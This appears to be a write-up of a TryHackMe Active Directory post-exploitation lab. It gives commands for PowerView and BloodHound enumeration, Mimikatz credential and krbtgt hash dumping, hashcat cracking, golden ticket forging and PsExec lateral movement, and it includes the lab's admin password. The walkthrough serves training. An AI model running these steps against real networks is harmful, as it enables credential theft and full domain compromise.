Room Link: https://tryhackme.com/room/postexploit
Presteps for Lab
SharpHound Installation
SharpHound version on the box is too old for the current version of Bloodhound so I had to update it.
Kali
Copy git clone https://github.com/BloodHoundAD/BloodHound.git
scp -r BloodHound/Collectors/SharpHound.ps1 Administrator@$VICTIM:C:/Users/Administrator/
Password: P@$$W0rd Added this line to SharpHound.ps1 before transfering so I could run the command right away
Victim
Copy powershell -ep bypass
.\SharpHound.ps1 BloodHound Installation
Copy apt-get install bloodhound
neo4j console Enumeration w/ Powerview
Kali
Copy ssh Administrator@$VICTIM
Password: P@$$W0rd
Victim
Run below to be able to run PowerView commands.
Copy powershell -ep bypass
. .\Downloads\PowerView.ps1 Enumerate the domain users.
Copy Get-NetUser | select cn Enumerate the domain groups.
Copy Get-NetGroup -GroupName *admin* Find Shared folders.
Get Operating systems on the network.
Copy Get-NetComputer -fulldata | select operatingsystem Enumeration w/ Bloodhound
Setup and get loot with Bloodhound.
Victim
Copy powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
Transfer Bloodhound results back to Kali. SCP can be used in this case
Kali
Copy scp Administrator@$VICTIM:C:/Users/Administrator/20230212071833_loot.zip loot.zip
Password: P@$$W0rd Mapping the network w/ BloodHound
Copy bloodhound --no-sandbox We can just drag the zip file to bloodhound to import it.
Find all Domain Admins
List all Kerberostable accounts
Dumping hashes w/ mimikatz
Kali
Copy ssh Administrator@$VICTIM
Password: P@$$W0rd Victim
Copy cd Downloads && mimikatz.exe Victim - Mimikatz
Copy privilege::debug
lsadump::lsa /patch Copy to Kali output back to Kali
Output only the hashes and remove all duplicates into a new file.
Kali
Copy cat hashes.txt | grep NTLM | awk -F ":" '{print $2}' | grep "\S" | sed 's/^[ \t]*//' | sort | uniq > hash.txt Kali
Copy hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show Golden Ticket Attacks w/ mimikatz
Kali
Copy ssh Administrator@$VICTIM
Password: P@$$W0rd Dump the krbtgt Hash
Victim
Copy cd downloads && mimikatz.exe This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket. Take note of what is outlined in red you'll need it to create the golden ticket.
Victim - Mimikatz
Copy privilege::debug
lsadump::lsa /inject /name:krbtgt Create a Golden Ticket
Victim - Mimikatz
Copy kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 Use the Golden Ticket to access other machine
This will open a new command prompt with elevated privileges to all machines.Access other Machines! - You will now have another command prompt with access to all other machines on the network.
Victim - Mimikatz
This doesn't actually work. Because of how tryhackme is setup but you would then be able to access other machines. In the example below you'd need to find out what other machines exists to pull this off.
Victim
Copy dir \\Desktop-1\c$
PsExec.exe \\Desktop-1 cmd.exe Enumeration w/ Server Manager
Kali
Copy rdesktop -d CONTROLLER -u Administrator $VICTIM
Password: P@$$W0rd Open Active Directory
